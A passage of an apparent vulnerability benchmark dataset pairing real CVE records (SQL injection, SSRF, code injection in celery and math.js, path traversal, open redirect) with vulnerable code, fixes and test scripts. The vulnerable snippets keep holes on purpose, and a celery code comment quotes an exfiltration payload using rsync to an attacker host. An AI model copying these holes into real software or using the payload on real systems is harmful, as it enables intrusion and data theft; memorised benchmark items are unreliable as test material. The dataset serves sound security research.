len(strings.TrimSpace(str)) == 0 {\n-\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n+\n+// EscapeQuote escape the string the single quote, double quote, and backtick\n+func EscapeQuote(str string) string {\n+\ttype Escape struct {\n+\t\tFrom string\n+\t\tTo string\n \t}\n-\tfields := strings.Split(str, \":\")\n-\tif len(fields) != 5 {\n-\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. (syntax: database:table:field:key:value)\", str)\n-\t}\n-\tdb := fields[0]\n-\ttable := fields[1]\n-\tfield := fields[2]\n-\tkey := fields[3]\n-\tvalue := fields[4]\n-\t//check value is int or not\n-\tif _, err := strconv.Atoi(value); err != nil {\n-\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n+\tescape := []Escape{\n+\t\t{From: \"`\", To: \"\"}, // remove the backtick\n+\t\t{From: `\\`, To: `\\\\`},\n+\t\t{From: `'`, To: `\\'`},\n+\t\t{From: `\"`, To: `\\\"`},\n \t}\n \n-\tsql := fmt.Sprintf(\"SELECT %s FROM %s.%s WHERE %s = %s\", field, db, table, key, value)\n-\treturn sql, nil\n+\tfor _, e := range escape {\n+\t\tstr = strings.ReplaceAll(str, e.From, e.To)\n+\t}\n+\treturn str\n }\n\n--- /dev/null\n+++ b/global/global.go\n@@ -0,0 +1,21 @@\n+func (r *MySQL) getSQL(str string) (string, error) {\n+\tif len(strings.TrimSpace(str)) == 0 {\n+\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n+\t}\n+\tfields := strings.Split(str, \":\")\n+\tif len(fields) != 5 {\n+\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. (syntax: database:table:field:key:value)\", str)\n+\t}\n+\tdb := global.EscapeQuote(fields[0])\n+\ttable := global.EscapeQuote(fields[1])\n+\tfield := global.EscapeQuote(fields[2])\n+\tkey := global.EscapeQuote(fields[3])\n+\tvalue := global.EscapeQuote(fields[4])\n+\t//check value is int or not\n+\tif _, err := strconv.Atoi(value); err != nil {\n+\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n+\t}\n+\n+\tsql := fmt.Sprintf(\"SELECT `%s` FROM `%s`.`%s` WHERE `%s` = %s\", field, db, table, key, value)\n+\treturn sql, nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-33967:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/easeprobe\ngit apply --ignore-whitespace --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestGetSQL$ github.com/megaease/easeprobe/probe/client/mysql\n", "unit_test_cmd": null} {"cve_id": "CVE-2025-24354", "cve_description": "imgproxy is server for resizing, processing, and converting images. Imgproxy does not block the 0.0.0.0 address, even with IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES set to false. This can expose services on the local host. This vulnerability is fixed in 3.27.2.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/imgproxy/imgproxy", "patch_url": ["https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081"], "programing_language": "Go", "vul_func": [{"id": "vul_go_95_1", "commit": "09e305c", "file_path": "security/source.go", "start_line": 33, "end_line": 57, "snippet": "func VerifySourceNetwork(addr string) error {\n\thost, _, err := net.SplitHostPort(addr)\n\tif err != nil {\n\t\thost = addr\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip == nil {\n\t\treturn ErrInvalidSourceAddress\n\t}\n\n\tif !config.AllowLoopbackSourceAddresses && ip.IsLoopback() {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowLinkLocalSourceAddresses && (ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast()) {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowPrivateSourceAddresses && ip.IsPrivate() {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_95_1", "commit": "3d4fed6", "file_path": "security/source.go", "start_line": 33, "end_line": 57, "snippet": "func VerifySourceNetwork(addr string) error {\n\thost, _, err := net.SplitHostPort(addr)\n\tif err != nil {\n\t\thost = addr\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip == nil {\n\t\treturn ErrInvalidSourceAddress\n\t}\n\n\tif !config.AllowLoopbackSourceAddresses && (ip.IsLoopback() || ip.IsUnspecified()) {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowLinkLocalSourceAddresses && (ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast()) {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowPrivateSourceAddresses && ip.IsPrivate() {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/security/source.go\n+++ b/security/source.go\n@@ -9,7 +9,7 @@\n \t\treturn ErrInvalidSourceAddress\n \t}\n \n-\tif !config.AllowLoopbackSourceAddresses && ip.IsLoopback() {\n+\tif !config.AllowLoopbackSourceAddresses && (ip.IsLoopback() || ip.IsUnspecified()) {\n \t\treturn ErrSourceAddressNotAllowed\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-1001002", "cve_description": "math.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result arbitrary execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/josdejong/mathjs", "patch_url": ["https://github.com/josdejong/mathjs/commit/8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_102_1", "commit": "4a93787", "file_path": "lib/expression/parse.js", "start_line": 576, "end_line": 621, "snippet": " function parseAssignment () {\n var name, args, value, valid;\n\n var node = parseConditional();\n\n if (token == '=') {\n if (type.isSymbolNode(node)) {\n // parse a variable assignment like 'a = 2/3'\n name = node.name;\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(new SymbolNode(name), value);\n }\n else if (type.isAccessorNode(node)) {\n // parse a matrix subset assignment like 'A[1,2] = 4'\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(node.object, node.index, value);\n }\n else if (type.isFunctionNode(node)) {\n // parse function assignment like 'f(x) = x^2'\n valid = true;\n args = [];\n\n name = node.name;\n node.args.forEach(function (arg, index) {\n if (type.isSymbolNode(arg)) {\n args[index] = arg.name;\n }\n else {\n valid = false;\n }\n });\n\n if (valid) {\n getTokenSkipNewline();\n value = parseAssignment();\n return new FunctionAssignmentNode(name, args, value);\n }\n }\n\n throw createSyntaxError('Invalid left hand side of assignment operator =');\n }\n\n return node;\n }"}], "fix_func": [{"id": "fix_js_102_1", "commit": "8d2d48d", "file_path": "lib/expression/parse.js", "start_line": 576, "end_line": 621, "snippet": " function parseAssignment () {\n var name, args, value, valid;\n\n var node = parseConditional();\n\n if (token == '=') {\n if (type.isSymbolNode(node)) {\n // parse a variable assignment like 'a = 2/3'\n name = node.name;\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(new SymbolNode(name), value);\n }\n else if (type.isAccessorNode(node)) {\n // parse a matrix subset assignment like 'A[1,2] = 4'\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(node.object, node.index, value);\n }\n else if (type.isFunctionNode(node) && type.isSymbolNode(node.fn)) {\n // parse function assignment like 'f(x) = x^2'\n valid = true;\n args = [];\n\n name = node.name;\n node.args.forEach(function (arg, index) {\n if (type.isSymbolNode(arg)) {\n args[index] = arg.name;\n }\n else {\n valid = false;\n }\n });\n\n if (valid) {\n getTokenSkipNewline();\n value = parseAssignment();\n return new FunctionAssignmentNode(name, args, value);\n }\n }\n\n throw createSyntaxError('Invalid left hand side of assignment operator =');\n }\n\n return node;\n }"}], "vul_patch": "--- a/lib/expression/parse.js\n+++ b/lib/expression/parse.js\n@@ -17,7 +17,7 @@\n value = parseAssignment();\n return new AssignmentNode(node.object, node.index, value);\n }\n- else if (type.isFunctionNode(node)) {\n+ else if (type.isFunctionNode(node) && type.isSymbolNode(node.fn)) {\n // parse function assignment like 'f(x) = x^2'\n valid = true;\n args = [];\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23727", "cve_description": "This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/celery/celery", "patch_url": ["https://github.com/celery/celery/commit/1f7ad7e6df1e02039b6ab9eec617d283598cad6b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_41_1", "commit": "2d8dbc2", "file_path": "celery/backends/base.py", "start_line": 339, "end_line": 369, "snippet": " def exception_to_python(self, exc):\n \"\"\"Convert serialized exception to Python exception.\"\"\"\n if exc:\n if not isinstance(exc, BaseException):\n exc_module = exc.get('exc_module')\n if exc_module is None:\n cls = create_exception_cls(\n from_utf8(exc['exc_type']), __name__)\n else:\n exc_module = from_utf8(exc_module)\n exc_type = from_utf8(exc['exc_type'])\n try:\n # Load module and find exception class in that\n cls = sys.modules[exc_module]\n # The type can contain qualified name with parent classes\n for name in exc_type.split('.'):\n cls = getattr(cls, name)\n except (KeyError, AttributeError):\n cls = create_exception_cls(exc_type,\n celery.exceptions.__name__)\n exc_msg = exc['exc_message']\n try:\n if isinstance(exc_msg, (tuple, list)):\n exc = cls(*exc_msg)\n else:\n exc = cls(exc_msg)\n except Exception as err: # noqa\n exc = Exception(f'{cls}({exc_msg})')\n if self.serializer in EXCEPTION_ABLE_CODECS:\n exc = get_pickled_exception(exc)\n return exc"}], "fix_func": [{"id": "fix_py_41_1", "commit": "1f7ad7e", "file_path": "celery/backends/base.py", "start_line": 340, "end_line": 409, "snippet": " def exception_to_python(self, exc):\n \"\"\"Convert serialized exception to Python exception.\"\"\"\n if not exc:\n return None\n elif isinstance(exc, BaseException):\n if self.serializer in EXCEPTION_ABLE_CODECS:\n exc = get_pickled_exception(exc)\n return exc\n elif not isinstance(exc, dict):\n try:\n exc = dict(exc)\n except TypeError as e:\n raise TypeError(f\"If the stored exception isn't an \"\n f\"instance of \"\n f\"BaseException, it must be a dictionary.\\n\"\n f\"Instead got: {exc}\") from e\n\n exc_module = exc.get('exc_module')\n try:\n exc_type = exc['exc_type']\n except KeyError as e:\n raise ValueError(\"Exception information must include\"\n \"the exception type\") from e\n if exc_module is None:\n cls = create_exception_cls(\n exc_type, __name__)\n else:\n try:\n # Load module and find exception class in that\n cls = sys.modules[exc_module]\n # The type can contain qualified name with parent classes\n for name in exc_type.split('.'):\n cls = getattr(cls, name)\n except (KeyError, AttributeError):\n cls = create_exception_cls(exc_type,\n celery.exceptions.__name__)\n exc_msg = exc.get('exc_message', '')\n\n # If the recreated exception type isn't indeed an exception,\n # this is a security issue. Without the condition below, an attacker\n # could exploit a stored command vulnerability to execute arbitrary\n # python code such as:\n # os.system(\"rsync /data attacker@192.168.56.100:~/data\")\n # The attacker sets the task's result to a failure in the result\n # backend with the os as the module, the system function as the\n # exception type and the payload\n # rsync /data attacker@192.168.56.100:~/data\n # as the exception arguments like so:\n # {\n # \"exc_module\": \"os\",\n # \"exc_type\": \"system\",\n # \"exc_message\": \"rsync /data attacker@192.168.56.100:~/data\"\n # }\n if not isinstance(cls, type) or not issubclass(cls, BaseException):\n fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'\n raise SecurityError(\n f\"Expected an exception class, got {fake_exc_type} with payload {exc_msg}\")\n\n # XXX: Without verifying `cls` is actually an exception class,\n # an attacker could execute arbitrary python code.\n # cls could be anything, even eval().\n try:\n if isinstance(exc_msg, (tuple, list)):\n exc = cls(*exc_msg)\n else:\n exc = cls(exc_msg)\n except Exception as err: # noqa\n exc = Exception(f'{cls}({exc_msg})')\n\n return exc"}], "vul_patch": "--- a/celery/backends/base.py\n+++ b/celery/backends/base.py\n@@ -1,31 +1,70 @@\n def exception_to_python(self, exc):\n \"\"\"Convert serialized exception to Python exception.\"\"\"\n- if exc:\n- if not isinstance(exc, BaseException):\n- exc_module = exc.get('exc_module')\n- if exc_module is None:\n- cls = create_exception_cls(\n- from_utf8(exc['exc_type']), __name__)\n- else:\n- exc_module = from_utf8(exc_module)\n- exc_type = from_utf8(exc['exc_type'])\n- try:\n- # Load module and find exception class in that\n- cls = sys.modules[exc_module]\n- # The type can contain qualified name with parent classes\n- for name in exc_type.split('.'):\n- cls = getattr(cls, name)\n- except (KeyError, AttributeError):\n- cls = create_exception_cls(exc_type,\n- celery.exceptions.__name__)\n- exc_msg = exc['exc_message']\n- try:\n- if isinstance(exc_msg, (tuple, list)):\n- exc = cls(*exc_msg)\n- else:\n- exc = cls(exc_msg)\n- except Exception as err: # noqa\n- exc = Exception(f'{cls}({exc_msg})')\n+ if not exc:\n+ return None\n+ elif isinstance(exc, BaseException):\n if self.serializer in EXCEPTION_ABLE_CODECS:\n exc = get_pickled_exception(exc)\n+ return exc\n+ elif not isinstance(exc, dict):\n+ try:\n+ exc = dict(exc)\n+ except TypeError as e:\n+ raise TypeError(f\"If the stored exception isn't an \"\n+ f\"instance of \"\n+ f\"BaseException, it must be a dictionary.\\n\"\n+ f\"Instead got: {exc}\") from e\n+\n+ exc_module = exc.get('exc_module')\n+ try:\n+ exc_type = exc['exc_type']\n+ except KeyError as e:\n+ raise ValueError(\"Exception information must include\"\n+ \"the exception type\") from e\n+ if exc_module is None:\n+ cls = create_exception_cls(\n+ exc_type, __name__)\n+ else:\n+ try:\n+ # Load module and find exception class in that\n+ cls = sys.modules[exc_module]\n+ # The type can contain qualified name with parent classes\n+ for name in exc_type.split('.'):\n+ cls = getattr(cls, name)\n+ except (KeyError, AttributeError):\n+ cls = create_exception_cls(exc_type,\n+ celery.exceptions.__name__)\n+ exc_msg = exc.get('exc_message', '')\n+\n+ # If the recreated exception type isn't indeed an exception,\n+ # this is a security issue. Without the condition below, an attacker\n+ # could exploit a stored command vulnerability to execute arbitrary\n+ # python code such as:\n+ # os.system(\"rsync /data attacker@192.168.56.100:~/data\")\n+ # The attacker sets the task's result to a failure in the result\n+ # backend with the os as the module, the system function as the\n+ # exception type and the payload\n+ # rsync /data attacker@192.168.56.100:~/data\n+ # as the exception arguments like so:\n+ # {\n+ # \"exc_module\": \"os\",\n+ # \"exc_type\": \"system\",\n+ # \"exc_message\": \"rsync /data attacker@192.168.56.100:~/data\"\n+ # }\n+ if not isinstance(cls, type) or not issubclass(cls, BaseException):\n+ fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'\n+ raise SecurityError(\n+ f\"Expected an exception class, got {fake_exc_type} with payload {exc_msg}\")\n+\n+ # XXX: Without verifying `cls` is actually an exception class,\n+ # an attacker could execute arbitrary python code.\n+ # cls could be anything, even eval().\n+ try:\n+ if isinstance(exc_msg, (tuple, list)):\n+ exc = cls(*exc_msg)\n+ else:\n+ exc = cls(exc_msg)\n+ except Exception as err: # noqa\n+ exc = Exception(f'{cls}({exc_msg})')\n+\n return exc\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23727:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/celery\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-23727/bin/python -m pytest t/unit/backends/test_base.py::test_BaseBackend_dict::test_not_an_exception_but_a_callable t/unit/backends/test_base.py::test_BaseBackend_dict::test_not_an_exception_but_another_object -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23727:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/celery\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-23727/bin/python -m pytest t/unit/backends/test_base.py -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2021-23393", "cve_description": "This affects the package Flask-Unchained before 0.9.0. When using the the _validate_redirect_url function, it is possible to bypass URL validation and redirect a user to an arbitrary URL by providing multiple back slashes such as \\\\\\evil.com/path. This vulnerability is only exploitable if an alternative WSGI server other than Werkzeug is used, or the default behaviour of Werkzeug is modified using 'autocorrect_location_header=False.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/briancappello/flask-unchained", "patch_url": ["https://github.com/briancappello/flask-unchained/commit/71e36b28166f9ffbe0a991f51127f0984f7e6a40", "https://github.com/briancappello/flask-unchained/commit/2bfeedf1bc31df851cab8c66df0c432b10406aad"], "programing_language": "Python", "vul_func": [{"id": "vul_py_202_1", "commit": "2bfeedf", "file_path": "flask_unchained/bundles/controller/utils.py", "start_line": 186, "end_line": 188, "snippet": "def encode_non_url_reserved_characters(url):\n # safe url reserved characters: https://datatracker.ietf.org/doc/html/rfc3986#section-2.2\n return urlquote(url, safe=\":/?#[]@!$&'()*+,;=\")"}], "fix_func": [{"id": "fix_py_202_1", "commit": "71e36b2", "file_path": "flask_unchained/bundles/controller/utils.py", "start_line": 186, "end_line": 188, "snippet": "def encode_non_url_reserved_characters(url):\n # safe url reserved characters: https://datatracker.ietf.org/doc/html/rfc3986#section-2.2\n return urlquote(url, safe=\":/?#[]@!$&'()*+,;=<>\")"}], "vul_patch": "--- a/flask_unchained/bundles/controller/utils.py\n+++ b/flask_unchained/bundles/controller/utils.py\n@@ -1,3 +1,3 @@\n def encode_non_url_reserved_characters(url):\n # safe url reserved characters: https://datatracker.ietf.org/doc/html/rfc3986#section-2.2\n- return urlquote(url, safe=\":/?#[]@!$&'()*+,;=\")\n+ return urlquote(url, safe=\":/?#[]@!$&'()*+,;=<>\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2015-5159", "cve_description": "python-kdcproxy before 0.3.2 allows remote attackers to cause a denial of service via a large POST request.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/latchset/kdcproxy", "patch_url": ["https://github.com/latchset/kdcproxy/commit/f274aa6787cb8b3ec1cc12c440a56665b7231882"], "programing_language": "Python", "vul_func": [{"id": "vul_py_315_1", "commit": "e4a7119", "file_path": "kdcproxy/__init__.py", "start_line": "172", "end_line": "276", "snippet": " def __call__(self, env, start_response):\n try:\n # Validate the method\n method = env[\"REQUEST_METHOD\"].upper()\n if method != \"POST\":\n raise HTTPException(405, \"Method not allowed (%s).\" % method)\n\n # Parse the request\n try:\n length = int(env[\"CONTENT_LENGTH\"])\n except AttributeError:\n length = -1\n try:\n pr = codec.decode(env[\"wsgi.input\"].read(length))\n except codec.ParsingError as e:\n raise HTTPException(400, e.message)\n\n # Find the remote proxy\n servers = self.__resolver.lookup(\n pr.realm,\n kpasswd=isinstance(pr, codec.KPASSWDProxyRequest)\n )\n if not servers:\n raise HTTPException(503, \"Can't find remote (%s).\" % pr)\n\n # Contact the remote server\n reply = None\n wsocks = []\n rsocks = []\n for server in map(urlparse.urlparse, servers):\n # Enforce valid, supported URIs\n scheme = server.scheme.lower().split(\"+\", 1)\n if scheme[0] not in (\"kerberos\", \"kpasswd\"):\n continue\n if len(scheme) > 1 and scheme[1] not in (\"tcp\", \"udp\"):\n continue\n\n # Do the DNS lookup\n try:\n port = server.port\n if port is None:\n port = scheme[0]\n addrs = socket.getaddrinfo(server.hostname, port)\n except socket.gaierror:\n continue\n\n # Sort addresses so that we get TCP first.\n #\n # Stick a None address on the end so we can get one\n # more attempt after all servers have been contacted.\n addrs = tuple(sorted(filter(self.__filter_addr, addrs)))\n for addr in addrs + (None,):\n if addr is not None:\n # Bypass unspecified socktypes\n if (len(scheme) > 1\n and addr[1] != self.SOCKTYPES[scheme[1]]):\n continue\n\n # Create the socket\n sock = socket.socket(*addr[:3])\n sock.setblocking(0)\n\n # Connect\n try:\n # In Python 2.x, non-blocking connect() throws\n # socket.error() with errno == EINPROGRESS. In\n # Python 3.x, it throws io.BlockingIOError().\n sock.connect(addr[4])\n except socket.error as e:\n if e.errno != 115: # errno != EINPROGRESS\n sock.close()\n continue\n except io.BlockingIOError:\n pass\n wsocks.append(sock)\n\n # Resend packets to UDP servers\n for sock in tuple(rsocks):\n if self.sock_type(sock) == socket.SOCK_DGRAM:\n wsocks.append(sock)\n rsocks.remove(sock)\n\n # Call select()\n timeout = time.time() + (15 if addr is None else 2)\n reply = self.__await_reply(pr, rsocks, wsocks, timeout)\n if reply is not None:\n break\n\n if reply is not None:\n break\n\n for sock in rsocks + wsocks:\n sock.close()\n\n if reply is None:\n raise HTTPException(503, \"Remote unavailable (%s).\" % pr)\n\n # Return the result to the client\n raise HTTPException(200, codec.encode(reply),\n [(\"Content-Type\", \"application/kerberos\")])\n except HTTPException as e:\n start_response(str(e), e.headers)\n return [e.message]\n\napplication = Application()"}], "fix_func": [{"id": "fix_py_315_1", "commit": "f274aa6", "file_path": "kdcproxy/__init__.py", "start_line": "173", "end_line": "281", "snippet": " def __call__(self, env, start_response):\n try:\n # Validate the method\n method = env[\"REQUEST_METHOD\"].upper()\n if method != \"POST\":\n raise HTTPException(405, \"Method not allowed (%s).\" % method)\n\n # Parse the request\n try:\n length = int(env[\"CONTENT_LENGTH\"])\n except AttributeError:\n raise HTTPException(411, \"Length required.\")\n if length < 0:\n raise HTTPException(411, \"Length required.\")\n if length > self.MAX_LENGTH:\n raise HTTPException(413, \"Request entity too large.\")\n try:\n pr = codec.decode(env[\"wsgi.input\"].read(length))\n except codec.ParsingError as e:\n raise HTTPException(400, e.message)\n\n # Find the remote proxy\n servers = self.__resolver.lookup(\n pr.realm,\n kpasswd=isinstance(pr, codec.KPASSWDProxyRequest)\n )\n if not servers:\n raise HTTPException(503, \"Can't find remote (%s).\" % pr)\n\n # Contact the remote server\n reply = None\n wsocks = []\n rsocks = []\n for server in map(urlparse.urlparse, servers):\n # Enforce valid, supported URIs\n scheme = server.scheme.lower().split(\"+\", 1)\n if scheme[0] not in (\"kerberos\", \"kpasswd\"):\n continue\n if len(scheme) > 1 and scheme[1] not in (\"tcp\", \"udp\"):\n continue\n\n # Do the DNS lookup\n try:\n port = server.port\n if port is None:\n port = scheme[0]\n addrs = socket.getaddrinfo(server.hostname, port)\n except socket.gaierror:\n continue\n\n # Sort addresses so that we get TCP first.\n #\n # Stick a None address on the end so we can get one\n # more attempt after all servers have been contacted.\n addrs = tuple(sorted(filter(self.__filter_addr, addrs)))\n for addr in addrs + (None,):\n if addr is not None:\n # Bypass unspecified socktypes\n if (len(scheme) > 1\n and addr[1] != self.SOCKTYPES[scheme[1]]):\n continue\n\n # Create the socket\n sock = socket.socket(*addr[:3])\n sock.setblocking(0)\n\n # Connect\n try:\n # In Python 2.x, non-blocking connect() throws\n # socket.error() with errno == EINPROGRESS. In\n # Python 3.x, it throws io.BlockingIOError().\n sock.connect(addr[4])\n except socket.error as e:\n if e.errno != 115: # errno != EINPROGRESS\n sock.close()\n continue\n except io.BlockingIOError:\n pass\n wsocks.append(sock)\n\n # Resend packets to UDP servers\n for sock in tuple(rsocks):\n if self.sock_type(sock) == socket.SOCK_DGRAM:\n wsocks.append(sock)\n rsocks.remove(sock)\n\n # Call select()\n timeout = time.time() + (15 if addr is None else 2)\n reply = self.__await_reply(pr, rsocks, wsocks, timeout)\n if reply is not None:\n break\n\n if reply is not None:\n break\n\n for sock in rsocks + wsocks:\n sock.close()\n\n if reply is None:\n raise HTTPException(503, \"Remote unavailable (%s).\" % pr)\n\n # Return the result to the client\n raise HTTPException(200, codec.encode(reply),\n [(\"Content-Type\", \"application/kerberos\")])\n except HTTPException as e:\n start_response(str(e), e.headers)\n return [e.message]\n\napplication = Application()"}, {"id": "fix_py_315_2", "commit": "f274aa6", "file_path": "kdcproxy/__init__.py", "start_line": "64", "end_line": "64", "snippet": " MAX_LENGTH = 128 * 1024"}], "vul_patch": "--- a/kdcproxy/__init__.py\n+++ b/kdcproxy/__init__.py\n@@ -9,7 +9,11 @@\n try:\n length = int(env[\"CONTENT_LENGTH\"])\n except AttributeError:\n- length = -1\n+ raise HTTPException(411, \"Length required.\")\n+ if length < 0:\n+ raise HTTPException(411, \"Length required.\")\n+ if length > self.MAX_LENGTH:\n+ raise HTTPException(413, \"Request entity too large.\")\n try:\n pr = codec.decode(env[\"wsgi.input\"].read(length))\n except codec.ParsingError as e:\n\n--- /dev/null\n+++ b/kdcproxy/__init__.py\n@@ -0,0 +1 @@\n+ MAX_LENGTH = 128 * 1024\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31502", "cve_description": "The operatorequals/wormnest repository through 0.4.7 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/operatorequals/wormnest", "patch_url": ["https://github.com/operatorequals/wormnest/commit/2dfe96fc2570586ac487b399ac20d41b3c114861"], "programing_language": "Python", "vul_func": [{"id": "vul_py_264_1", "commit": "dd98162", "file_path": "app.py", "start_line": 113, "end_line": 141, "snippet": "def dir_listing(req_path):\n '''\n Found here:\nhttps://stackoverflow.com/questions/23718236/python-flask-browsing-through-directory-with-files\n '''\n # Joining the base and the requested path\n abs_path = os.path.join(CONFIG['SRV_DIR'], req_path)\n\n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n return abort(404)\n\n # Check if path is a file and serve\n if os.path.isfile(abs_path):\n return send_file(abs_path)\n\n # Show directory contents\n files = os.listdir(abs_path)\n full_paths = []\n for f in files:\n full_paths.append(\n (f, os.path.join(request.base_url, f))\n )\n # print (full_paths)\n add_url_link = \"%s%s/add\" % (request.url_root, CONFIG['MANAGE_URL_DIR'])\n return render_template('file.html',\n files=full_paths,\n add_url=add_url_link\n )"}], "fix_func": [{"id": "fix_py_264_1", "commit": "2dfe96f", "file_path": "app.py", "start_line": 113, "end_line": 141, "snippet": "def dir_listing(req_path):\n '''\n Found here:\nhttps://stackoverflow.com/questions/23718236/python-flask-browsing-through-directory-with-files\n '''\n # Joining the base and the requested path\n abs_path = safe_join(CONFIG['SRV_DIR'], req_path)\n\n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n return abort(404)\n\n # Check if path is a file and serve\n if os.path.isfile(abs_path):\n return send_file(abs_path)\n\n # Show directory contents\n files = os.listdir(abs_path)\n full_paths = []\n for f in files:\n full_paths.append(\n (f, os.path.join(request.base_url, f))\n )\n # print (full_paths)\n add_url_link = \"%s%s/add\" % (request.url_root, CONFIG['MANAGE_URL_DIR'])\n return render_template('file.html',\n files=full_paths,\n add_url=add_url_link\n )"}], "vul_patch": "--- a/app.py\n+++ b/app.py\n@@ -4,7 +4,7 @@\n https://stackoverflow.com/questions/23718236/python-flask-browsing-through-directory-with-files\n '''\n # Joining the base and the requested path\n- abs_path = os.path.join(CONFIG['SRV_DIR'], req_path)\n+ abs_path = safe_join(CONFIG['SRV_DIR'], req_path)\n \n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0871", "cve_description": "Missing Authorization in GitHub repository gogs/gogs prior to 0.12.5.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/64102be2c90e1b47dbdd379873ba76c80d4b0e78"], "programing_language": "Go", "vul_func": [{"id": "vul_go_204_1", "commit": "91f2cde", 